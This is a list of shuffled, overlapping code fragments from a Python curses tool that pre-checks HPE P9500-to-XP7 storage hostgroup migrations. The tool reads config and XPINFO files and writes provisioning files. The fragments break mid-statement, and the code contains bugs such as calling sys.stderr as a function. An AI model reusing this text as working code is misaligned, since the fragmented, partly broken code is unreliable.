"for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups",
"self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n): if n <",
"for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to",
"line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we",
"self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key",
"file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu",
"index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif",
"- 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ### adjust",
"= list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self): return self.selection class",
"menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\") logger.info(\"#\" * linelen)",
"with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row)",
"consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win",
"if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get()))",
"self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display()",
"self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search = search def update(self):",
"only add lines in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr",
"sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1)",
"select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu",
"0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif n > 0:",
"map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write",
"< 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ###",
"HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0)",
"+ \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name))",
"### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ###",
"xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict =",
"panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"if self.position == len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} #",
"- 1: self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end =",
"items to match search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys()",
"### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict:",
"self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files ### for index,item",
"2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO :",
"sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list",
"= self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear()",
"cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value",
"hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup",
"2 and self.slice_end < len(self.filtered_items) - 1: ### slide slice down ### self.slice_end",
">= self.width: line = line[:self.width-1] ### only add lines in the slice ###",
"exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"):",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n <",
"to hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name",
"curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ###",
"= \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh()",
"def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display() def",
"= 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir =",
"self.slice_end < len(self.filtered_items) - 1: ### slide slice down ### self.slice_end += n",
"= box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0]",
"hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency",
"list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during",
"self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line)",
"and self.slice_start >= 1: ### slide slice up ### self.slice_start += n if",
"sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1)",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN",
"n < 0: if self.position - self.slice_start < 2 and self.slice_start >= 1:",
"self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear() line = \"{}:",
"= list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class",
"else: err_msg = \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg +",
"in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for box_name",
"file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file",
"string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {}",
"start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\") logger.info(\"#\" *",
"file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file",
"self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for",
":: position = {}, n = {}\".format(self.position,n )) ### adjust slice ### if",
"display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if",
"{}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set()",
"LOG : xpmig_precheck.log TODO : add generate temporary horcm file and daemon to",
"consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ###",
"0 self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end <",
"#################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup",
"curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title =",
"name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level =",
"consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to",
"in the slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key =",
"slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position",
"to file for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key",
"ConfigParser import sys import os import os.path import csv import string import xp7",
"serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if",
"main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth and width ###",
"= curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ###",
"< 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) -",
"upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >=",
"selection items list to match the new search criteria \"\"\" if self.search.get() !=",
"except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not",
"hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam VERSION : Based",
"self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir",
"panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1)",
"= min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self):",
"self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\") key",
"site_dict = {} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS ####################################################################################################",
"the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start",
"selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row",
"title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ###",
"self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def",
"self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear() line",
"= xpinfo_dir self.selection = selection def update(self): \"\"\" update the list of xpinfo",
"1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]:",
"try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try:",
"n if self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position",
"> 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) -",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n): if n",
"except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except:",
"consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now",
"self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end < len(self.display_list)",
"0: if self.slice_start >= 1: self.slice_start += n if self.slice_start < 0: self.slice_start",
"\"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1)",
"0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position +=",
"XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs",
"title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win",
"mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line",
"> 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) -",
"+ self.slice_len self.position = 0 def navigate(self,n): self.position += n if self.position <",
"= \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width:",
"clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window",
"self.window = window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg)",
"box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report =",
"window self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items = items",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection",
"consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup",
"= len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice",
"if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str):",
"list to match the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update",
"not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name",
"log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir",
"logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions)",
"- self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate()",
"key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP",
"for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list =",
"True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files ### for",
"short to be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for",
"def clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr):",
"def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width =",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to",
"self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key ==",
"linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict)",
"def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del",
"len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len",
"def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line)",
"### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP>",
"exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\")",
"for x in self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border()",
"= os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels()",
"len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr",
"= ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear))",
"0 elif self.position >= len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top()",
"large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE",
": add generate temporary horcm file and daemon to pairdisplay & check on",
"known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too",
"panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear()",
"for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file",
"window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear()",
"window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len",
"1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end",
"open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) >",
"= line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def",
"### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window =",
"= text self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear()",
"hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name]",
"= self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear() line =",
"summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency",
"self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in",
"if box_name in site_dict: site = site_dict[box_name] else: err_msg = \"No site defined",
"len(self.xpinfo_file_list) - 1 if n < 0: if self.position - self.slice_start < 2",
"if self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP:",
"stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set",
"##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter =",
"self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str",
"box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]:",
"HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1)",
"criteria 1.3 Add config file 2.0 Consistency check update 2.1 Add xpinfo file",
"* linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\")",
"addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index",
"to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ###",
"= len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate()",
"exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\")",
"collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir",
"#!/usr/bin/python \"\"\" #################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to",
"for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict:",
"hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for box_name in hostgroup_dict:",
"self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"= instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for box {},",
"add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:]",
"try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except:",
"enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line",
"index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode =",
"addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in",
"and width ### if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not",
">= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n < 0: if self.position",
"{} serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict = {}",
"self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]:",
"curses import panel import re import logging import logging.handlers import copy from ConfigParser",
"= box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list:",
"be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr in",
"self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position",
"box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object):",
"in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for box_name,hostgroup_name in",
"self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not",
"### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict = {} instance_dict",
"self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end",
"if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line",
"settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\")",
"len(line) >= self.width: line = line[:self.width-1] ### only add lines in the slice",
"defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in",
"update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0",
"for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode",
"is ready for migration AUTHOR : <NAME> / StorageTeam VERSION : Based on",
"value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\")",
"\"\"\" import curses from curses import panel import re import logging import logging.handlers",
"menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu",
"\"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\")",
"self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position: mode =",
"if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items)",
"box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object",
"= xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start",
"def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line =",
"xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary",
"= title self.consistent = [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for",
"f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname",
"try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except:",
"boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict",
"slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end -",
"try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except:",
"horcm file and daemon to pairdisplay & check on status #################################################################################################### \"\"\" import",
"= set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by",
"= \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1)",
